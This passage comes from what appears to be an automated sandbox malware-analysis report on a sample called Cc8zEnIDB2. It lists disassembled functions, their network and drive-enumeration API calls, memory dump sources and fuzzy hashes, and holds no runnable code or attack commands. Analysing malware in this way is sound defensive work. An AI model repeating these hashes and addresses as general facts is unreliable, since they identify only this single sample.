                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3358416759-2605427207
                                                      • Opcode ID: 73f7b2ef148a4f38577bcc93578d127f8237221adb6ecdc58fc9ed920ad69c85
                                                      • Instruction ID: f0c15db37c2c9e3dba72760a7a0c10c354b733163710d0e772b835a52214c2fd
                                                      • Opcode Fuzzy Hash: 73f7b2ef148a4f38577bcc93578d127f8237221adb6ecdc58fc9ed920ad69c85
                                                      • Instruction Fuzzy Hash: EC21FB31808781AAF7269729DC46FE777ACEFD1328F040615F98853191FB32698687E2
                                                      Function 004ED5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202), ref: 004ED65B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: if_nametoindex$iphlpapi.dll
                                                      • API String ID: 724789610-3097795196
                                                      • Opcode ID: d26b8a524023d2bede29668163b1625f3bfff98738a50af7fb0b3d2c42231836
                                                      • Instruction ID: 1b8c368adb1301b24d3a8efa761bf8de979e1c1cd94111043e54623877ed242b
                                                      • Opcode Fuzzy Hash: d26b8a524023d2bede29668163b1625f3bfff98738a50af7fb0b3d2c42231836
                                                      • Instruction Fuzzy Hash: 5F017BD0D413805BFB01A73D9D1B32736905B91308F48087AE869832C3F72DC948C292
                                                      Function 0059AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0059AB9B
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0059ABE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocketsocket
                                                      • String ID:
                                                      • API String ID: 416004797-0
                                                      • Opcode ID: c0b42246b66c9aadf409b2f5398490b7f9d4b2fa5d0f5050cabb7c0ea48bd5de
                                                      • Instruction ID: 46ab826a019e62b741bfbab17816a15b48563d173019631f9e46102716c7c90c
                                                      • Opcode Fuzzy Hash: c0b42246b66c9aadf409b2f5398490b7f9d4b2fa5d0f5050cabb7c0ea48bd5de
                                                      • Instruction Fuzzy Hash: C1E1AF706043029BEF20CF24C885B6BBBA5FF85314F144A2DF9999B291E775DD44CBA2
                                                      Function 07150395 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: e0f722eb0f042d033eac558e127a173772886a3d91e4741bc51c6fc15e100751
                                                      • Instruction ID: 01edb2f282f46706888acc08ffcf4c139b56abfdb83c894c906c89888e85942a
                                                      • Opcode Fuzzy Hash: e0f722eb0f042d033eac558e127a173772886a3d91e4741bc51c6fc15e100751
                                                      • Instruction Fuzzy Hash: 35516CEB26C121FDB14A85E22B14AFB576DE1CB730B328826FC27D5582E3884F4D5131
                                                      Function 0715033E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2dfdc0ff0d796ba20e7e4218b46eb4aca984b30edc4371a600dcc5693404f7ab
                                                      • Instruction ID: 7928d5d78cd72b7c7b7dc7d9126a27670940617d73ce8a961ffd0134296e2b37
                                                      • Opcode Fuzzy Hash: 2dfdc0ff0d796ba20e7e4218b46eb4aca984b30edc4371a600dcc5693404f7ab
                                                      • Instruction Fuzzy Hash: 6E519DFB268110FDB14985A12B14AFB576DE2CB730B32842AFC27D6582E3884F4D1131
                                                      Function 071503BA Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2a2ff59566dad44f265b3dc6a98f0457bd1b4f97ece5ac1bfbab022df6f03c14
                                                      • Instruction ID: 5baf7f4eb2683e6b24070095ba33eb0e1863c7116b565118637bf57b4d93f1b5
                                                      • Opcode Fuzzy Hash: 2a2ff59566dad44f265b3dc6a98f0457bd1b4f97ece5ac1bfbab022df6f03c14
                                                      • Instruction Fuzzy Hash: E2519CEB268111FD714E85E22B14AFB5B6DE1CB730B32882AFC27D5582E3884E5A1131
                                                      Function 0715036B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: e06ba419fdadf57542c3b3f5dceea118a474e3d270600d32c70702d5e46d918b
                                                      • Instruction ID: 11618f6a1650b47cbe7156586f5cea56fb4959cb85583641781dd52a2275b60b
                                                      • Opcode Fuzzy Hash: e06ba419fdadf57542c3b3f5dceea118a474e3d270600d32c70702d5e46d918b
                                                      • Instruction Fuzzy Hash: 5E516CEB268111FDB14E85E12B14AFB576DE1CB730B328826FC27D5582E3884F5D1131
                                                      Function 07150384 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 9ee50ab1fbb83203fa2fdf4235d79746c837bf79fe36e54fa88f1969b994b9a3
                                                      • Instruction ID: c8dbbfb23ad226f31c7b0f0803bdb31f06cca7b078c65ce8321d2a89a26484fb
                                                      • Opcode Fuzzy Hash: 9ee50ab1fbb83203fa2fdf4235d79746c837bf79fe36e54fa88f1969b994b9a3
                                                      • Instruction Fuzzy Hash: 9E418BEB26C111FD714A85E22B14AFB576DE1CB730B32882AFC27D5582E3884E4D1131
                                                      Function 071503E0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 52994ee9e89c26563ee72ff8f98abbd928055858c0969031e6b1362e18e37813
                                                      • Instruction ID: aca812e7d6fe1a931e1f7daf4ad74bfae4bd90870e90aaa3f66795b0b611e261
                                                      • Opcode Fuzzy Hash: 52994ee9e89c26563ee72ff8f98abbd928055858c0969031e6b1362e18e37813
                                                      • Instruction Fuzzy Hash: 6341C1EB26C111FD710E85E12B54AFB5B6DE5CB730B32842AFC27D6682E3940E5D5131
                                                      Function 071503F9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 2eee20471f0f67ad3b8f20640d632f6f22d0ad9542a43d7e0d4bf7c89fd9bdeb
                                                      • Instruction ID: 496614b62267da94451168f91f4936fa7e14e0d6bdd122e2d234fe2bb1b21161
                                                      • Opcode Fuzzy Hash: 2eee20471f0f67ad3b8f20640d632f6f22d0ad9542a43d7e0d4bf7c89fd9bdeb
                                                      • Instruction Fuzzy Hash: 5C41BFFB268111FD710E85E12B54AFB576EE5CB730B32842AFC27D2682E3884F495131
                                                      Function 0715041A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 8201b6a5771c53e697c71e031f78ec5c753c9881e5ef450c3055bf1680492ad5
                                                      • Instruction ID: 248e2744164fcdf6e8be0d0bacefd8269fdacffa6499988a71a415677e5a413d
                                                      • Opcode Fuzzy Hash: 8201b6a5771c53e697c71e031f78ec5c753c9881e5ef450c3055bf1680492ad5
                                                      • Instruction Fuzzy Hash: AE41BFEB228111FD710E85E12B14AF75B6DE5CB730B328426FC27D6682E3880F4D5131
                                                      Function 07150428 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: e3b5fb48f9e47e412b43baa08b3aecfbfee401184aca32a866290df0c0f77ce8
                                                      • Instruction ID: e7106a76292735f2dd85ec6b3ac765e5db175c4b5898b90ab13fd526382f6d1b
                                                      • Opcode Fuzzy Hash: e3b5fb48f9e47e412b43baa08b3aecfbfee401184aca32a866290df0c0f77ce8
                                                      • Instruction Fuzzy Hash: 2C41AFEB268111FC710E85E62B54AFB576DE1CB730B328526FC27D6A82E3984F8D5131
                                                      Function 07150443 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 30bd3b0d60b559e421ee58bc0bf285fcc0c052ff4f5da587f20bbdf493e6052b
                                                      • Instruction ID: cdce720f284e33c0ac20dbac253ae812c7a488aaae43f0eaa95b281342d2eb61
                                                      • Opcode Fuzzy Hash: 30bd3b0d60b559e421ee58bc0bf285fcc0c052ff4f5da587f20bbdf493e6052b
                                                      • Instruction Fuzzy Hash: E341B0EB26C210FDB10A85A12B54AFB576DE5DB730B32882AF817D6682E3984F4D5131
                                                      Function 071504AB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: c59ba704da068fdae5a242954a55f1519aa03a54f2ac968386344b0ffd67c512
                                                      • Instruction ID: c047f62274e3cf5c1af53396b0ec88d32ce2f1f3c698a89ad3fa4628dd3b398a
                                                      • Opcode Fuzzy Hash: c59ba704da068fdae5a242954a55f1519aa03a54f2ac968386344b0ffd67c512
                                                      • Instruction Fuzzy Hash: AC41D1EB268111FCB10E85E12B14AFB576DE2CB730B328826FC27D6582E3884F4E1131
                                                      Function 07150431 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 7dcf37b3262e1d0bc94f41918f979ff2a10f519572c42c8e35f001627f93caf1
                                                      • Instruction ID: 40f17aa37de5fd9e71b49cb7533573ccaf9fc4dd3a0246f0b395534603e6ec7b
                                                      • Opcode Fuzzy Hash: 7dcf37b3262e1d0bc94f41918f979ff2a10f519572c42c8e35f001627f93caf1
                                                      • Instruction Fuzzy Hash: C141D0EB268111FCB10E85E22B14AFB576DE1CB730B328826FC27D6682E3884F4D1131
                                                      Function 004D78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID: FD %s:%d sclose(%d)
                                                      • API String ID: 2781271927-3116021458
                                                      • Opcode ID: 98e0dbfcbdae7ddd98f4b289688883d46a6a7685d6a489d02296fa9569aabbf8
                                                      • Instruction ID: 383193bd700e37646528e69839cc1c70865b7eea255c07f1b53cf89b972c23a9
                                                      • Opcode Fuzzy Hash: 98e0dbfcbdae7ddd98f4b289688883d46a6a7685d6a489d02296fa9569aabbf8
                                                      • Instruction Fuzzy Hash: CCD05E329092216B8920695A6C59C5B7AA8DECAFA0B46489AF940A7300E1319C0087F2
                                                      Function 0059B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0059B29E,?,00000000,?,?), ref: 0059B0B9
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00583C41,00000000), ref: 0059B0C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastconnect
                                                      • String ID:
                                                      • API String ID: 374722065-0
                                                      • Opcode ID: d70e0c8f1e7f28469ecf04d0a68e45f8b2c93125dfe6ea7bde08baff15d58c8e
                                                      • Instruction ID: d1bafdb5a6fcfde7c233783f0328771c480b811d3dd2122487ea623d3fc6d64a
                                                      • Opcode Fuzzy Hash: d70e0c8f1e7f28469ecf04d0a68e45f8b2c93125dfe6ea7bde08baff15d58c8e
                                                      • Instruction Fuzzy Hash: 3201D8322042005BFE205A69ED88F6BBBA9FF89764F040B24F978931D1D726DD508751
                                                      Function 0719001C Relevance: 2.2, APIs: 1, Instructions: 744COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 888408086b0a694fcbc6086681300afdf7155f7f6144650443df972ad97a5ede
                                                      • Instruction ID: 7598387fc6212f2a60a24c74bddff02218e0b6f85a0dca897e62632c7f48d734
                                                      • Opcode Fuzzy Hash: 888408086b0a694fcbc6086681300afdf7155f7f6144650443df972ad97a5ede
                                                      • Instruction Fuzzy Hash: 87F102EB16C113BDBA4A81452B54AF66B6EE6CFB30F328436F407C6682E3944F4B5171
                                                      Function 07190017 Relevance: 2.2, APIs: 1, Instructions: 741COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c04941bdec4fc6a8f19f9245336e16cb946773f8c8d5c3da1ae7720b23dd3817
                                                      • Instruction ID: e28d22951b87e123969ecd93079737f44fd7b8fca8d7c708d0d676505b6b3fc3
                                                      • Opcode Fuzzy Hash: c04941bdec4fc6a8f19f9245336e16cb946773f8c8d5c3da1ae7720b23dd3817
                                                      • Instruction Fuzzy Hash: 97F102EB16C113BDBA4A81452B54AF66B7EE6CFB30F328436F407C6682E3944B4B5171
                                                      Function 07190057 Relevance: 2.2, APIs: 1, Instructions: 739COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ed12d8aada800c3e7f493b9563945f27eada0fe7113836c29777b6c27694960
                                                      • Instruction ID: a95d6c09e5f56f8c8ac26bc18d64afbf3bbdc530a574b29a29d2b52bde72a581
                                                      • Opcode Fuzzy Hash: 3ed12d8aada800c3e7f493b9563945f27eada0fe7113836c29777b6c27694960
                                                      • Instruction Fuzzy Hash: 3FF1F2EB26C113BDBA4A81452B54AF6677EE6CFB30F328436F407C6682E3944B4B5171
                                                      Function 0719003A Relevance: 2.2, APIs: 1, Instructions: 731COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52171987ae670f3714d9a6a0a537a7f702e105cad8850ee5db6304371b5f3443
